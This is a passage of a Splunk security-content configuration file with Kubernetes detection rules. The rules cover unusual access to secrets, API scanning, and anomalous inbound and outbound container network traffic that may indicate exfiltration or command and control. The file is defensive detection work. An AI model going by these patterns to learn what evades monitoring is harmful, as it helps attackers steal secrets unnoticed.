["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | search NOT `kube_allowed_user_names` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_user_name_filter` [ESCU - Kubernetes Access Scanning - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects potential scanning activities within a Kubernetes environment. It identifies unauthorized access attempts, probing of public APIs, or attempts to exploit known vulnerabilities. The analytic detects this behavior by monitoring Kubernetes audit logs for patterns indicative of scanning, such as repeated failed access attempts or unusual API requests. This behavior is worth identifying for a SOC as it could indicate an attackers preliminary step in an attack, aiming to gather information about the system to find potential vulnerabilities. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects potential scanning activities within a Kubernetes environment. It identifies unauthorized access attempts, probing of public APIs, or attempts to exploit known vulnerabilities. The analytic detects this behavior by monitoring Kubernetes audit logs for patterns indicative of scanning, such as repeated failed access attempts or unusual API requests. This behavior is worth identifying for a SOC as it could indicate an attackers preliminary step in an attack, aiming to gather information about the system to find potential vulnerabilities. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Access Scanning - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes scanning from ip $src_ip$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Access Scanning - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` "user.groups{}"="system:unauthenticated" "responseStatus.code"=403 | iplocation sourceIPs{} | stats count values(userAgent) as userAgent values(user.username) as user.username values(user.groups{}) as user.groups{} values(verb) as verb values(requestURI) as requestURI values(responseStatus.code) as responseStatus.code values(responseStatus.message) as responseStatus.message values(responseStatus.reason) as responseStatus.reason values(responseStatus.status) as responseStatus.status by sourceIPs{} Country City | where count > 5 | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_access_scanning_filter` [ESCU - Kubernetes Anomalous Inbound Network Activity from Process - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection detects inbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are provided with context identifying the Kubernetes cluster, the workload name, and the type of anomaly.This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics for destination (receiving) workload process pairs over the last 1 hour, with the average of those metrics for those pairs over the last 30 days in order to detect any anonymously high inbound network activity. Anomalies in inbound network traffic may suggest that the container is receiving unexpected or unauthorized data, potentially indicative of a breach, a vulnerability exploitation attempt, an attempt to overload the service, or propagation of malware. Successful compromise of a containerised application resulting in the ability to upload data, can result in installation of command and control software or other malware, data integrity damage, container escape, and further compromise of the environment. Additionally this kind of activity may result in resource contention, performance degradation and disruption to the normal operation of the environment. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection detects inbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are provided with context identifying the Kubernetes cluster, the workload name, and the type of anomaly.This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics for destination (receiving) workload process pairs over the last 1 hour, with the average of those metrics for those pairs over the last 30 days in order to detect any anonymously high inbound network activity. Anomalies in inbound network traffic may suggest that the container is receiving unexpected or unauthorized data, potentially indicative of a breach, a vulnerability exploitation attempt, an attempt to overload the service, or propagation of malware. Successful compromise of a containerised application resulting in the ability to upload data, can result in installation of command and control software or other malware, data integrity damage, container escape, and further compromise of the environment. Additionally this kind of activity may result in resource contention, performance degradation and disruption to the normal operation of the environment. action.escu.how_to_implement = To gather NPM metrics the Open Telemetry to the Kubernetes Cluster and enable Network Performance Monitoring according to instructions found in Splunk Docs https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly set up the add-on to ingest metrics from O11y cloud using the following settings, and any other settings left at default:\ * Name sim_npm_metrics_to_metrics_index \ * Org ID \ * Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \ * Metric Resolution 10000 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-10 action.escu.modification_date = 2024-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Inbound Network Activity from Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Inbound Network Activity from Process in kubernetes cluster $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Inbound Network Activity from Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(tcp.*) as tcp.* avg(udp.*) as udp.* where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name dest.workload.name dest.process.name span=10s | eval key='dest.workload.name' + ":" + 'dest.process.name' | join type=left key [ mstats avg(tcp.*) as avg_tcp.* avg(udp.*) as avg_udp.* stdev(tcp.*) as stdev_tcp.* avg(udp.*) as stdev_udp.* where `kubernetes_metrics` AND earliest=-30d latest=-1h by dest.workload.name dest.process.name | eval key='dest.workload.name' + ":" + 'dest.process.name' ] | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 3 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | fillnull | eval anomalies = split(replace(anomalies, ",\s$$$$", "") ,", ") | where anomalies!="" | stats count(anomalies) as count values(anomalies) as anomalies by k8s.cluster.name dest.workload.name dest.process.name | where count > 5 | rename k8s.cluster.name as host | `kubernetes_anomalous_inbound_network_activity_from_process_filter` [ESCU - Kubernetes Anomalous Inbound Outbound Network IO - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies high Inbound or Outbound Network IO anomalies in a Kubernetes container. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. These anomalies may indicate security threats such as data exfiltration, command and control communication, service disruptions, or unauthorized data transfers. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, financial losses, and reputational damage. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies high Inbound or Outbound Network IO anomalies in a Kubernetes container. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. These anomalies may indicate security threats such as data exfiltration, command and control communication, service disruptions, or unauthorized data transfers. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, financial losses, and reputational damage. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Inbound Outbound Network IO - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Inbound Outbound Network IO from container on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Inbound Outbound Network IO - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(k8s.pod.network.io) as io where `kubernetes_metrics` by k8s.cluster.name k8s.pod.name k8s.node.name direction span=10s | eval service = replace('k8s.pod.name', "-\w{5}$$|-[abcdef0-9]{8,10}-\w{5}$$", "") | stats avg(eval(if(direction="transmit", io,null()))) as outbound_network_io avg(eval(if(direction="receive", io,null()))) as inbound_network_io by k8s.cluster.name k8s.node.name k8s.pod.name service _time | eval key = 'k8s.cluster.name' + ":" + 'service' | lookup k8s_container_network_io_baseline key | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 4 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by k8s.cluster.name k8s.node.name k8s.pod.name service | rename service as k8s.service | where count > 5 | rename k8s.node.name as host | `kubernetes_anomalous_inbound_outbound_network_traffic_io_filter` [ESCU - Kubernetes Anomalous Inbound to Outbound Network IO Ratio - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies changes in network communication behavior in a Kubernetes container by examining inbound to outbound network IO ratios. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. These anomalies may indicate security threats such as data exfiltration, command and control communication, or compromised container behavior. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, and unauthorized access within the Kubernetes cluster. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies changes in network communication behavior in a Kubernetes container by examining inbound to outbound network IO ratios. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. These anomalies may indicate security threats such as data exfiltration, command and control communication, or compromised container behavior. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, and unauthorized access within the Kubernetes cluster. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Inbound to Outbound Network IO Ratio - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Inbound to Outbound Network IO Ratio from Container on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Inbound to Outbound Network IO Ratio - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(k8s.pod.network.io) as io where `kubernetes_metrics` by k8s.cluster.name k8s.pod.name k8s.node.name direction span=10s | eval service = replace('k8s.pod.name', "-\w{5}$|-[abcdef0-9]{8,10}-\w{5}$", "") | eval key = 'k8s.cluster.name' + ":" + 'service' | stats avg(eval(if(direction="transmit", io,null()))) as outbound_network_io avg(eval(if(direction="receive", io,null()))) as inbound_network_io by key service k8s.cluster.name k8s.pod.name k8s.node.name _time | eval inbound:outbound = inbound_network_io/outbound_network_io | eval outbound:inbound = outbound_network_io/inbound_network_io | fields - *network_io | lookup k8s_container_network_io_ratio_baseline key | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 4 * 'stdev_<>'), anomalies + "<> ratio higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by k8s.cluster.name k8s.node.name k8s.pod.name service | rename service as k8s.service | where count > 5 | rename k8s.node.name as host | `kubernetes_anomalous_inbound_to_outbound_network_io_ratio_filter` [ESCU - Kubernetes Anomalous Outbound Network Activity from Process - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection detects outbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are provided with context identifying the Kubernetes cluster, the workload name, and the type of anomaly. This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics for source (transmitting) workload process pairs over the last 1 hout, with the average of those metrics for those pairs over the last 30 days in order to detect any anonymously high outbound network activity. Anonymously high outbound network traffic from a process running in a container is a potential indication of data exfiltration, or an indication that the process has been modified. Anomalously high outbound network activity from a process running within a container suggests the potential compromise, which may lead to unauthorized data exfiltration, communication with malicious entities, or the propagation of malware to external systems. The compromised container could also serve as a pivot point for further attacks within the containerized environment. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection detects outbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are provided with context identifying the Kubernetes cluster, the workload name, and the type of anomaly. This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics for source (transmitting) workload process pairs over the last 1 hout, with the average of those metrics for those pairs over the last 30 days in order to detect any anonymously high outbound network activity. Anonymously high outbound network traffic from a process running in a container is a potential indication of data exfiltration, or an indication that the process has been modified. Anomalously high outbound network activity from a process running within a container suggests the potential compromise, which may lead to unauthorized data exfiltration, communication with malicious entities, or the propagation of malware to external systems. The compromised container could also serve as a pivot point for further attacks within the containerized environment. action.escu.how_to_implement = To gather NPM metrics the Open Telemetry to the Kubernetes Cluster and enable Network Performance Monitoring according to instructions found in Splunk Docs https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly set up the add-on to ingest metrics from O11y cloud using the following settings, and any other settings left at default:\ * Name sim_npm_metrics_to_metrics_index \ * Org ID \ * Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \ * Metric Resolution 10000 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-10 action.escu.modification_date = 2024-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Outbound Network Activity from Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Outbound Network Activity from Process in kubernetes cluster $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Outbound Network Activity from Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(tcp.*) as tcp.* avg(udp.*) as udp.* where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name source.process.name span=10s | eval key='source.workload.name' + ":" + 'source.process.name' | join type=left key [ mstats avg(tcp.*) as avg_tcp.* avg(udp.*) as avg_udp.* stdev(tcp.*) as stdev_tcp.* avg(udp.*) as stdev_udp.* where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name source.process.name | eval key='source.workload.name' + ":" + 'source.process.name' ] | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 3 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | fillnull | eval anomalies = split(replace(anomalies, ",\s$$$$", "") ,", ") | where anomalies!="" | stats count(anomalies) as count values(anomalies) as anomalies by k8s.cluster.name source.workload.name source.process.name | where count > 5 | rename k8s.cluster.name as host | `kubernetes_anomalous_outbound_network_activity_from_process_filter` [ESCU - Kubernetes Anomalous Traffic on Network Edge - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection detects network traffic volume anomalies between workloads in a microservices hosted application, or between a workload and the outside world if the workload is shown as (unknown). This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics between workloads over the last 1 hour, with the average of those metrics over the last 30 days in order to detect any anonymously high inbound or outbound network activity. Unexpected spikes in network traffic may signify unauthorized data transfers, or abnormal behavior within the microservices ecosystem. Such activity might signify data exfiltration, unauthorized lateral movement, within the microservices environment. If a bad actor is responsible for this traffic they could compromise additional services or extract sensitive data, potentially leading to data breaches. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection detects network traffic volume anomalies between workloads in a microservices hosted application, or between a workload and the outside world if the workload is shown as (unknown). This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics between workloads over the last 1 hour, with the average of those metrics over the last 30 days in order to detect any anonymously high inbound or outbound network activity. Unexpected spikes in network traffic may signify unauthorized data transfers, or abnormal behavior within the microservices ecosystem. Such activity might signify data exfiltration, unauthorized lateral movement, within the microservices environment. If a bad actor is responsible for this traffic they could compromise additional services or extract sensitive data, potentially leading to data breaches. action.escu.how_to_implement = To gather NPM metrics the Open Telemetry to the Kubernetes Cluster and enable Network Performance Monitoring according to instructions found in Splunk Docs https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly set up the add-on to ingest metrics from O11y cloud using the following settings, and any other settings left at default:\ * Name sim_npm_metrics_to_metrics_index \ * Org ID \ * Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \ * Metric Resolution 10000 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-10 action.escu.modification_date = 2024-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Traffic on Network Edge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Traffic on Network Edge in kubernetes cluster $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Traffic on Network Edge - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(tcp.*) as tcp.* avg(udp.*) as udp.* where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name dest.workload.name span=10s | eval 